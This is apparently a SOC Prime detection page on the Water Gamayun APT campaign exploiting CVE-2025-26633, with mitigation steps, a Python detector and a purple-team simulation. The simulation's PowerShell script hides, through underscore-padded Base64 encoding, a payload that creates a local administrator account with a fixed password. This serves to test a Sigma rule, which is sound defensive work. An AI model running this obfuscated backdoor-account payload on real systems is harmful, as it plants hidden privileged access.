SOC Prime Bias: Critical

27 Nov 2025 19:10

Zscaler Threat Hunting Exposes and Reconstructs the Water Gamayun APT Campaign

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

The report covers a multi-stage intrusion attributed to the Water Gamayun APT group that exploits a zero-day MMC vulnerability (CVE-2025-26633) to deliver PowerShell payloads in a double-extension RAR archive.

Investigation

Zscaler reconstructed the kill chain from a Bing search redirect to a compromised site, download of a .pdf.rar file, exploitation of MSC EvilTwin, staged PowerShell scripts, and execution of the ItunesC.exe backdoor.

Mitigation

Guidance includes monitoring double-extension archives, inspecting redirects, detecting encoded PowerShell commands, and blocking the malicious IP and domains.

Response

On detection, alert on mmc.exe spawning PowerShell with -EncodedCommand, quarantine the file, block outbound connections to 103.246.147.17, and activate incident response procedures.

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:
    The attacker, leveraging Water Gamayun’s methodology, prepares a malicious PowerShell payload that creates a new local user and adds it to the Administrators group. To hide the payload, the attacker:

    1. Writes the PowerShell script in clear text.
    2. Encodes it to UTF‑16LE Base64.
    3. Inserts an underscore (_) after every 4 characters to inflate entropy.
    4. Chains a |Replace('_','') operation so that the runtime PowerShell removes the underscores before decoding, matching the detection signature.

    The final execution command is:

    powershell.exe -EncodedCommand <Base64StringWithUnderscores> | Replace('_','')

    This exact command line satisfies the Sigma rule’s two conditions (-EncodedCommand and |Replace('_','')), generating Sysmon EventID 1 and Security EventID 4688 entries that the rule will flag.

  • Regression Test Script:
    The script below automates the creation of the obfuscated payload and executes it. It can be run on any Windows host with PowerShell 5.1+.

    # Water Gamayun style PowerShell obfuscation simulation
    # Step 1: Define the malicious PowerShell payload (adds a local admin user).
    # Note: $securePwd is used instead of $pwd, which is a PowerShell automatic variable.
    $payload = @'
    $user      = "tempAdmin"
    $securePwd = ConvertTo-SecureString "P@ssw0rd!" -AsPlainText -Force
    New-LocalUser -Name $user -Password $securePwd -FullName "Temp Admin" -Description "Test admin account"
    Add-LocalGroupMember -Group "Administrators" -Member $user
    '@

    # Step 2: Encode to UTF-16LE (what -EncodedCommand expects) and then Base64
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($payload)
    $b64   = [Convert]::ToBase64String($bytes)

    # Step 3: Insert an underscore after every 4 characters, as described in the narrative above.
    # -split with a capturing group returns the captured chunks interleaved with empty strings,
    # so the empty entries are dropped before appending '_' to each chunk.
    $b64Underscored = ($b64 -split '(.{4})' | Where-Object { $_ } | ForEach-Object { $_ + '_' }) -join ''

    # Step 4: Execute with the required Replace('_','') pipeline.
    # This command line is the telemetry the Sigma rule keys on (-EncodedCommand and |Replace('_','')).
    powershell.exe -EncodedCommand $b64Underscored | Replace('_','')

  • Cleanup Commands:
    The following commands remove the test user and restore the environment.

    # Cleanup: Remove the temporary admin account created by the test
    $user = "tempAdmin"
    if (Get-LocalUser -Name $user -ErrorAction SilentlyContinue) {
        Remove-LocalUser -Name $user
        Write-Host "Deleted test user $user."
    } else {
        Write-Host "Test user $user does not exist."
    }
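As an added, defender-side counterpart to the simulation above (this is example code, not part of the SOC Prime page or the Sigma rule itself), the Python below applies the two command-line conditions the narrative states to constructed sample process-creation command lines and decodes the underscore-inflated Base64 back to the original script. The sample command lines and their benign payloads are constructed for this example, and because the rule's exact selection logic is not shown on the page, the matching here is an assumption.

```python
import base64
import re

# Assumed rule conditions, taken from the narrative above: an -EncodedCommand
# argument followed (later in the command line) by |Replace('_','').
ENCODED_RE = re.compile(r"-EncodedCommand\s+([A-Za-z0-9+/=_]+)", re.IGNORECASE)
REPLACE_RE = re.compile(r"\|\s*Replace\('_',''\)", re.IGNORECASE)


def obfuscate(script: str) -> str:
    """Build a sample token the way the simulation does: UTF-16LE -> Base64 -> '_' after every 4 chars."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return "".join(b64[i:i + 4] + "_" for i in range(0, len(b64), 4))


def decode_encoded_command(token: str):
    """Strip the inflating underscores and decode the UTF-16LE Base64 payload.

    Returns the recovered script, or None when the token is not decodable
    (corrupt Base64, odd byte count, ...), so a bad token never breaks triage.
    """
    cleaned = token.replace("_", "")
    try:
        return base64.b64decode(cleaned, validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None


def analyze(cmdline: str) -> dict:
    """Evaluate one process-creation command line against both conditions and recover the payload."""
    m = ENCODED_RE.search(cmdline)
    has_replace = REPLACE_RE.search(cmdline) is not None
    token = m.group(1) if m else None
    return {
        "alert": token is not None and has_replace,  # both conditions, as the rule requires
        "has_encoded": token is not None,
        "has_replace": has_replace,
        "underscored": token is not None and "_" in token,
        "decoded": decode_encoded_command(token) if token else None,
    }


# Constructed sample command lines (not real telemetry); payloads are benign.
SAMPLE_LINES = [
    "powershell.exe -EncodedCommand " + obfuscate('Write-Output "hello"') + " | Replace('_','')",
    "powershell.exe -NoProfile -Command Get-Process",
    "powershell.exe -EncodedCommand " + base64.b64encode("dir".encode("utf-16-le")).decode("ascii"),
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(analyze(line))
```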